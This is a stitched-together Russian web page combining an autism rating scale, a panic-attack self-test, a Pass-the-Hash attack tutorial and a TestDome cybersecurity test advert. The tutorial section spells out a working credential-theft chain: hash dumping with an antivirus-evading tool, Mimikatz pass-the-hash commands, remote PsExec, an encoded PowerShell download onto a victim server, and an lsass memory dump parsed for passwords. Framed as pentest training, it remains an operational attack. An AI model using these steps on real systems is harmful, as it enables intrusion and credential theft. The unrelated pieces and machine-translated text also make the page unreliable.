Резко выражено — Почти всегда говорит на одну и ту же тему, одержимость определенной деятельностью. Может заинтересоваться цифрами или буквами (еще до произнесения первого слова, например «папа»), научиться читать раньше чем говорить, помнить погодные данные и календарные даты за много лет, интересоваться частями механических объектов. Как правило, интерес настолько силен, что не остается времени на другую деятельность.

9. Вращение объектов, кружение, интерес к вращающимся предметам.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редкий, но ненормальный в сосредоточенности, интерес к вращению.

Умеренно выражено — Часто занимается вращением.

Резко выражено — Почти постоянно и непрерывно сосредоточен на вращающихся предметах или кружении вокруг своей оси. Может быть очень увлечен вентиляторами, потолочными вентиляторами или игрушками с вращающимися частями.

10. Ограниченный, узкий интерес (просмотр одного и того же видео).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко, но явно неуместно, занимается тем же повторяющимся поведением.

Умеренно выражено — Часто занимается одной и той же деятельностью. Может остановиться без истерики.

Резко выражено — Постоянно одно и то же повторяющееся поведение или интерес, смотрит один и тот же ролик снова и снова, говорить об одном и том же, очень сердится, если его прерывают.

11. Трудности в прекращении рутинной деятельности или разговора.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — В состоянии прекратить навязчивое поведение, но имеет трудности.

Умеренно выражено — Часто говорит о темах, которые явно не интересуют слушателей, не будучи в состоянии понять, что наскучил. Деятельность может включать некоторые механические повторяющиеся игры с веревками или более сложные задачи. Темы могут быть историческими или научными, но крайне детализированы.

Резко выражено — Постоянно говорит фрагментами, бессвязанно.

12. Сосредоточение на необычных объектах (камни, палки, шнурки, волосы).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Редко, но очевидно аномально, концентрируется на необычном предмете.

Умеренно выражено — Часто сосредоточен на необычном предмете, но не доходит до истерики при убирании этого предмета.

Резко выражено — Всегда имеет необычный объект (веревка, камень, ручка, бутылка, часть игрушки и др.). Удаление объекта вызывает истерику.

13. Потребность в ритуалах и рутине, сопротивление изменениям.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Склонен следовать процедурам и навязчивым ритуалам, но знает о них и может управлять ими.

Умеренно выражено — Часто следует графику, имеет ритуалы. Сложно заставить изменить схему поведения, но можно.

Резко выражено — Всегда следует одной и той же схеме поведения, часто участвует в ритуальной (навязчивой, нелогичной) деятельности. Попытки изменить этот график вызывают тяжелые приступы гнева.

14. Ограниченный вкус в консистенции, форме продукта (неприятие твердой пищи).

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но есть некоторые «странности» в выборе еды, основанные на вкусе, форме или консистенции.

Умеренно выражено — Ест ограниченный набор продуктов.

Резко выражено — Ест только определенную пищу, отказывается от твердых продуктов, настаивает на том, чтобы пить только молоко (или что-то подобное) или потреблять один вид пищи даже в 10 лет. Возможно, связано с ощущениями в полости рта.

15. Возможности саванта, сверхразвитые способности для его возрастной группы.

Нет — Абсолютно в норме, никогда не было проблем.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Некоторые углубленные знания, ограничивающиеся областью интересов.

Умеренно выражено — Явно глубокие, исчерпывающие знания в очень узкой области.

Резко выражено — Уникальные способности (гений), исчерпывающие и подробнейшие знания в очень ограниченной области (математика, литература, история, погода) при очень ограниченных возможностях общения с другими людьми (научился читать раньше чем говорить).


IV. Раздел «Поведенческие трудности».

Нет — Норма.

Преодолено — Абсолютно нормально, но ранее имелись проявления.

Не ярко выражено — Почти нормально, но присутствуют редкие истерики, неуместные вспышки трудного поведения.

Умеренно выражено — Тяжелые, потенциально опасные, поведенческие вспышки, но могут быть предсказуемыми и, следовательно, контролируемыми.

Резко выражено — Поведение настолько сложное, что нельзя оставлять без внимания даже не минимальное время, так как становится неподконтрольным, «диким», может нанести самоповреждение и причинить вред окружающим.


Для диагностики детского аутизма в соответствии с критериями DSM-IV необходимо наличие связанных со значительной дисфункцией особенностей по каждому разделу с оценкой «Умеренно выражено» или «Резко выражено».

Критерии DSM-IV предусматривают проявление нарушений, связанных с аутизмом, не позднее возраста 3х лет и дальнейшее их значительное ухудшение в одном из следующих:

Если эти требования соблюдены, то показатели могут соответствовать следующим определениям:

0 — 49 = нет аутизма
50-100 = невыраженный аутизм
100-150 = умеренно выраженный аутизм
> 150 = тяжелая форма аутизма

Приведенные выше цифры являются произвольными оценками и должны быть подтверждены исследованиями большой части населения, которые еще не выполнены.

Общее количество баллов не может свидетельствовать об аутизме, если нет дисфункций в каждом из трех разделов. Однако, если нет дисфункций, присутствующих во втором разделе «Речь и задержка языкового развития», но общий балл выше 60, то можно предположить синдром Аспергера.

Интерпретация опросника шкалы оценки аутизма должна выполняется опытным врачом с в присутствии обоих родителей. Интерпретация данных, полученных от родителей, заполнивших опросник без соответствующих инструкций и объяснений особенностей, может привести к диагностическим ошибкам.

Окончательный диагноз должен учитывать клинический опыт эксперта в связи с выше собранными данными.

Для диагностики специфических синдромов, например Аспергера или Ретта, пользуйтесь соответствующими критериями диагностики DSM-IV.

Тест на панические атаки — самопроверка

Последнее обновление 27 марта 2021 г.

Тест на панические атаки, чтобы узнать, испытываете ли вы панические атаки, и если да, то в какой степени:

Пройдите этот короткий тест из 10 вопросов для самопроверки посмотрите, испытываете ли вы панические атаки.

Просмотрите каждое утверждение и ответьте на него в соответствии с тем, что вы действительно чувствуете. Все утверждения требуют ответа.

Когда вы закончите, внимательно просмотрите свои ответы, чтобы убедиться, что вы ответили на все вопросы. Когда вы будете готовы, нажмите кнопку «Получить результаты теста», чтобы ваши результаты отобразились на следующей странице. Обратите внимание, что отображение результатов может занять некоторое время.

Вопросы:


  • Бывают ли у вас эпизоды, когда вы испытываете такой страх, что начинаете бояться, что можете полностью потерять его?*
    • Нет никогда
    • Да, раз или два
    • Да, иногда
    • Да, часто
    • Да всегда
  • Бывают ли у вас эпизоды, когда вы испытываете такой страх, что вам кажется, что у вас может случиться полный психический срыв?*
    • Нет никогда
    • Да, но только один или два раза
    • Да, иногда
    • Да, часто
    • Да всегда
  • Бывают ли у вас эпизоды, когда вы чувствуете, что полностью сходите с ума?*
    • Нет никогда
    • Да, время от времени
    • Да, иногда
    • Да, часто
    • Да всегда
  • Когда вы нервничаете или боитесь, бывают ли у вас эпизоды неконтролируемой дрожи или дрожи?*
    • Нет никогда
    • Да, раз или два
    • Да, иногда
    • Да, часто
    • Да всегда
  • Бывают ли у вас эпизоды, когда вы так боитесь, что думаете, что можете потерять сознание?*
    • Нет никогда
    • Да, но не часто
    • Да, иногда
    • Да, часто
    • Да все время
  • Бывают ли у Вас эпизоды сильного страха без видимой причины?*
    • Нет никогда
    • Да, раз или два
    • Да, иногда
    • Да, часто
    • Да всегда
  • Были ли у вас эпизоды, когда вы становитесь настолько напуганы, что ваше сердце бьется быстро и сильно, вы потеете и чувствуете слабость в коленях?*
    • Нет никогда
    • Да, раз или два
    • Да, иногда
    • Да, часто
    • Да все время
  • Бывают ли у вас приступы тревоги и страха, которые вы не можете контролировать?*
    • Нет никогда
    • Да, раз или два
    • Да, иногда
    • Да, часто
    • Да все время
  • Вы когда-нибудь доводили себя до панической атаки (состояние сильного испуга)?*
    • Нет никогда
    • Да, раз или два
    • Да, иногда
    • Да, часто
    • Да все время
  • Бывало ли так, что вы когда-нибудь выходили из себя, а потом не могли перестать бояться?*
    • Нет никогда
    • Да, время от времени
    • Да, иногда
    • Да, часто
    • Да все время

Сочетание хорошей информации о самопомощи и работы с опытным терапевтом, тренером или консультантом по тревожным расстройствам является наиболее эффективным способом борьбы с тревогой и ее многочисленными симптомами. Пока не будут устранены основные причины беспокойства, которые мы называем глубинными факторами беспокойства, борьба с тревогой и нездоровьем может возвращаться снова и снова. Работа с основными факторами тревоги — лучший способ справиться с проблемной тревогой.

Дополнительные ресурсы

  • Полный список признаков, типов, причин, диагностики и лечения тревожных расстройств.
  • Симптомы тревоги и приступов паники могут быть сильными переживаниями. Узнайте, что они собой представляют и как их остановить.
  • Как остановить приступ тревоги и паники.
  • Бесплатные онлайн-тесты на тревожность для выявления тревожности. Двухминутные тесты с мгновенными результатами. Такие как:
    • Тест на тревогу
    • Тест на тревожное расстройство
    • Тест ОКР
    • Тест социальной тревожности
    • Общий тест тревожности
    • Тест на гиперстимуляцию
  • Тревога 101 — это краткое описание тревоги, тревожного расстройства и способов его преодоления.

Вернуться к тестам на тревожность.

alarmcentre.com: информация, поддержка и терапия тревожного расстройства и его симптомов, включая тест на панические атаки.

Учебное пособие по хэш-атаке

Pass The Hash — это атака индустрии! Он работает везде, где учетные данные не управляются должным образом. Атаки могут происходить как на локальные, так и на доменные учетные записи.

Существуют определенные виды профилактических мер, но чаще всего они не реализованы в инфраструктуре. Другими словами, благодаря единому входу в Windows можно переходить с хоста на хост при аутентификации только с помощью хэша.

Прежде всего, каждый раз, когда необходимо проводить тесты на проникновение, Pass The Hash является одним из элементов всего теста. Причина в том, что многие компании ничего с этим не делают, а атака популярна последние пару лет.

В этом выпуске вы узнаете , как выполнить атаку Pass The Hash и какие предварительные условия для нее, а также почему управление паролями локального администратора важно, но не все. Возьмем, к примеру, вход в систему с привилегированными учетными записями на рабочей станции или на серверах — это то, на что мы обязательно должны обратить внимание. На протяжении всего процесса я буду использовать инструмент CQHashDumpV2, который является довольно уникальным инструментом, созданным нашей командой, он также не распознается ни одним антивирусом (пока).

 

Pass The Hash Attack – Процедура

При выполнении Pass The Hash с нуля требуются права локального администратора, в основном из-за привилегии отладки; у вас также должны быть открыты две консоли: одна как пользователь, а другая как администратор.

В консоли, работающей от имени администратора, мы можем определить ее по списку различных видов привилегий. Здесь я появлюсь как член местных администраторов.

Если вы еще не пробовали атаку Pass The Hash, следите за обновлениями и вперед.

Шаг первый: получение инструмента

Первое, что необходимо для выполнения Pass The Hash, — это получение хэша. На рынке доступно множество инструментов, которые вы можете использовать. Но будьте осторожны, потому что многие из них могут быть не совсем безопасными. Одним из примеров является бесплатный инструмент под названием pwdump, который поставляется в различных вариантах и ​​иногда содержит вредоносное ПО. Причина, по которой мы написали собственный инструмент CQHashDumpV2, заключается в том, что он нам, конечно же, был нужен для наших тестов на проникновение.

Абсолютно неприемлемо использование неизвестных нам инструментов нигде в среде заказчика. Только те инструменты, которые являются нашими инструментами или те, которые мы хорошо знаем.

Шаг второй: сброс хеша

Первое, что нужно здесь сделать, это повысить уровень до локальной системы, поскольку нам нужно получить доступ к секретным кустам в реестре. Для этого мы будем использовать инструмент PsExec, который уже был показан в предыдущем видео, поэтому, если вы останетесь со мной, вы сможете использовать его сейчас: psexec -s -i -d cmd. exe.

Вы можете видеть, что я являюсь nt авторитетом\системой. Следующим этапом будет переход в папку инструментов и я буду использовать CQHashDumpV2. Я буду использовать опцию /samdump . Это позволяет мне выполнять дамп хеша в реальном времени.

 

Существует два типа хэшей. Один из них называется LM Hash, и если внимательно присмотреться, это зеркальное значение. Эти значения точно такие же. Это означает, что это пустой пароль. Технически это означает, что этот хэш не используется. Часть после двоеточия называется NT Hash или NTLM Hash. Это MD4, рассчитанный для паролей пользователей, и мы будем использовать его для выполнения атаки Pass The Hash.

Здесь мы вошли в систему как локальная учетная запись Paula и хотим стать локальным администратором, поэтому для этого мы будем использовать Mimikatz. Это наша версия с пометкой «CQURE Edition».

>>ССЫЛКА на Mimikatz<<

Сначала мы получим привилегию отладки: privial::debug . Это привилегия, необходимая нам для работы с такими процессами, как lsass.exe.

Когда мы его получим, следующим этапом будет использование: sekurlsa::pth для Pass The Hash. Затем указанное имя пользователя — в данном случае администратор — и затем домен: localhost, потому что в этом случае у нас нет никаких учетных данных домена и /ntlm с этим конкретным хэшем. Команда выглядит так:

sekurlsa::pth    /user:Administrator     /domain:localhost /ntlm:<здесь вы поместите NT Hash>

Это атака Pass The Hash, как видите, она очень проста. В этой атаке мы аутентифицируемся локально, создаем токен, где мы будем локальным администратором (с SID 500).

Автоматически откроется новая консоль. Если я выполню команду whoami, это даст интересный результат, поскольку у меня есть информация о себе, но это не совсем так, у нас уже есть административный токен.

Следующее, что мы сделаем, это воспользуемся инструментом PsExec, и мы проверим, можем ли мы получить доступ к этому конкретному серверу здесь, и этот сервер будет 10. 10.10.200. Мы хотели бы выполнить cmd.exe удаленно.

Вы увидите разницу. Позвольте мне запустить эту консоль от имени администратора. Это локальная консоль, а серая — консоль с токеном локального администратора. Поэтому мы решили использовать PsExec следующим образом: psexec.exe \\10.10.10.200 cmd.exe . Мы не можем использовать его в качестве исходной локальной учетной записи, поскольку имя пользователя или пароль неверны. Это интересно еще и тем, что мы можем спросить: о каком пароле идет речь? В данном случае это единый вход, используемый Windows.

На токене администратора

Двигаясь дальше, мы попадем в ту же ситуацию, что и раньше, но с токеном локального администратора. В новой консоли нам нужно выполнить ту же команду Psexec. Теперь это займет некоторое время, но вы увидите, что это работает, потому что локальный администратор использует тот же пароль. При входе в систему введите whoami, и вы увидите, что вы являетесь локальным администратором.

Как выполнить дамп памяти

В предыдущих руководствах я показал вам этот сценарий для реализации LAPS: Пароль локального администратора Решение для управления паролями локального администратора, но здесь мы продолжим, потому что вам будет показано, как мы способны на этом этапе выполнить дамп памяти, чтобы получить более высокие привилегии во время атаки.

Теперь это может быть немного сложно, так как нам нужно загрузить инструмент на сервер, который является нашей жертвой здесь. Единственное, что у нас есть, это командная строка. Мы могли бы сделать это, подключившись к PsExec, для копирования есть опция /c. Но допустим, мы этого не сделали, что теперь? Мы могли бы использовать FTP и попытаться скопировать что-нибудь из сети. Один из моих любимых способов — использовать закодированную команду PowerShell.

Закодированная команда PowerShell

Закодированная команда PowerShell может быть выполнена один раз на устройстве удаленно. Я подготовил небольшой сценарий PowerShell, в котором мы используем командлет Invoke-WebRequest для загрузки инструмента Procdump в файл pd.exe. Итак, мы поняли. Мы конвертируем это в Base64.

$tool=”Invoke-WebRequest -OutFile c:\temp\pd.exe”

$base64=[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes( $инструмент))

ССЫЛКА на Procdump с сайта Sysinternals. com

Результат Base64 мы можем передать в файл, скажем, base64.txt, а наш base64.txt будет командой, которую мы будем использовать в закодированном PowerShell команда. Это будет так: PowerShell — ec <здесь вы должны вставить строку base64>.

После запуска закодированной команды PowerShell мы загружаем инструмент из Интернета и сохраняем его в папке. pd.exe — это наш ProcDump.

Сейчас важно, как использовать такие инструменты. Например, ProcDump при первом запуске имеет параметр для принятия EULA ( accepteula), его необходимо использовать, иначе вы застрянете в удаленной консоли. Мы хотели бы выполнить дамп памяти процесса lsass.exe: procdump.exe accepteula -ma lsass.exe . Дамп пишется, значит дамп готов.

Как вы помните из предыдущих видео, вы можете взять именно этот дамп и затем использовать его, например, с Mimikatz, для анализа памяти, и тогда мы сможем извлечь из него информацию.

Переключимся на машину, где у нас есть дамп. Мы можем переименовать его в lsass.dmp. Мы можем открыть Mimikatz, а затем ввести:

sekurlsa::minidump lsass.dmp

, а затем: sekurlsa::logonpasswords

, и тогда мы сможем обнаружить в этом дампе все интересные данные, которые есть. связанные с учетными данными пользователя.

Мы делаем это на удаленном сервере прямо сейчас, но в процессе взлома это будет невозможно. Вы можете попытаться скопировать эти данные обратно вашему клиенту, а затем проанализировать их на своей стороне. Вот как это должно быть, я показываю вам информацию о том, что находится в этой свалке.

Мы выполнили атаку Pass The Hash, и вы должны быть знакомы со всеми шагами, чтобы воспроизвести ее. Помните, что атака возможна, когда у вас есть возможность получить привилегию отладки, это означает, что вы должны быть членом группы локальных администраторов, и это является предварительным условием для атаки Pass The Hash. Помните, что здесь может помочь PsExec (от Sysinternals), но только в образовательных целях, вы не можете использовать его для взлома (это противоречит лицензии). В конце концов, нам понадобится Mimikatz или какие-то другие специальные инструменты для проведения атаки. Для выполнения дампов памяти вы можете использовать любой дампер памяти, для нашего примера я использовал ProcDump, где в конце мы проанализировали дамп с помощью Mimikatz.

Вот и все; надеюсь, вам понравится. Следующий эпизод будет о программах-вымогателях, так что это довольно крутая тема. Если вы не хотите пропустить это, следите за нами на Facebook, Youtube. Подпишитесь на меня в твиттере, или подпишитесь на нашу замечательную рассылку новостей, или просто используйте все это. Я обязательно увижу тебя там.
Если вы хотите знать, как эффективно предотвратить это — следите за обновлениями!

Онлайн-тест кибербезопасности | TestDome

Оценки навыков TestDome используются более чем 8 000 компаний и 880 000 тестируемых.

Для соискателей

Оттачивайте свои навыки и получайте сертификаты достижений, когда попадете в число 25% лучших.

Пройдите пробный тест

Для компаний

Тестируйте кандидатов с реальными проблемами и проводите собеседования с лучшими из них.

Зарегистрируйтесь, чтобы предложить этот тест

О тесте

Онлайн-тест Cybersecurity оценивает знания кандидатов в области веб-приложений и сетевой безопасности.

Идеально подходит для проверки перед приемом на работу. Хороший специалист по кибербезопасности должен знать, как защитить веб-приложения и сети.

Этот онлайн-тест требует, чтобы кандидаты ответили на вопросы с несколькими вариантами ответов и заполнили пропуски на вопросы о веб-приложениях и сетевой безопасности.

Примеры общедоступных вопросов

Спуфинг электронной почты

Общедоступный

Сетевое администрирование

Сервер электронной почты

Сетевая безопасность

Атака спуфинга

Сотрудники компании никогда не отправляли на адреса электронной почты множество уведомлений о возврате сообщений . Выберите варианты ниже, которые подходят для данного сценария.

Решить вопрос

Товары для офиса

Общедоступный

Безопасность веб-приложений

Авторизация

Интернет-магазин канцелярских товаров хочет повысить безопасность своего веб-сайта. Разработчик предложил ряд изменений.

Какие изменения повысят безопасность?

Решить вопрос

Конфиденциальность IP

Общедоступный

Сетевое администрирование

Уровень приложений

IP

Network Security

Выберите методы, которые можно использовать для сокрытия общедоступного IP-адреса при совершении вызовов на удаленный сервер через Интернет.

Решить вопрос

Магазин товаров для кошек

Общедоступный

Безопасность веб-приложений

CSRF

Веб-приложение для заказа корма для кошек взимает плату с пользователей и размещает заказ при отправке HTTP-запроса GET по следующему URL-адресу:

3 9000 http ://www. catsupplies.com/order?brand=xxxxx&quantity=xxxxx

Вредоносный веб-сайт может добавить на свой сайт такие фрагменты:

  

Что поможет защититься от таких атак, учитывая, что веб-приложение имеет политику CORS, которая разрешает запросы только с одного и того же сайта?

Решить вопрос

Типы производительности

Новые

Общедоступные

Веб-тестирование

Веб-тестирование производительности

Для следующих сценариев выберите наиболее подходящий тип тестирования производительности.

Решить вопрос

Просмотреть все общедоступные вопросы

Для соискателей: получить сертификат

Получите бесплатный сертификат, набрав 25% лучших результатов в тесте по кибербезопасности, отвечая на общедоступные вопросы.

Пройти сертификационный тест

Образец серебряного сертификата

Sunshine Caprio

Java и SQL

TestDome
Сертификат

Посмотреть сертификат

Пройти сертификационный тест

Для компаний: премиум-вопросы

Купите TestDome, чтобы получить доступ к премиум-вопросам, которые нельзя отработать.
Верните деньги, если найдете ответ на какой-либо премиальный вопрос в Интернете.

Зарегистрируйтесь, чтобы предложить этот тест

Еще 9 премиальных вопросов по кибербезопасности

Поиск пользователей, безопасность транспортного уровня, веб-уязвимости, веб-безопасность, биржевые данные, магазин Umbrella, производитель мебели, страховая компания, отчет XSS.

Skills and topics tested

  • Web Application Security
  • Security Testing
  • SQL Injection
  • Network Administration
  • Network Security
  • Presentation Layer
  • Protocol
  • Firewall
  • Application Layer
  • IP
  • Encryption
  • CSRF
  • Авторизация
  • Хранение паролей
  • XSS

Для рабочих ролей

  • Аналитик по кибербезопасности
  • Аналитик по информационной безопасности
  • Сетевой администратор
  • Системный администратор (сисадмин)

Образец отчета кандидата

Что говорят другие (хотя и не обширная) серия тестов на выбор, и не отнимает у кандидата чрезмерное количество времени.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *